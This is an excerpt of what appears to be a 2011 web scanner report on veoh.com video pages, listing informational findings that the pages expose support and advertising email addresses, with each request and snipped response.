Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:02 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.15. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.16. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.17. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.18. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.19. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:25 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.20. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:29 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 134506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.21. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=46
Content-Length: 134905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.22. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:15 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 134399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.23. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 134852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.24. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:57 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 134505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.25. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20758438BTte3QQz

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=6
Content-Length: 132755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.26. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=15
Content-Length: 94311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.27. http://www.veoh.com/browse/videos/category/action_adventure4957f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/videos/category/action_adventure4957f HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
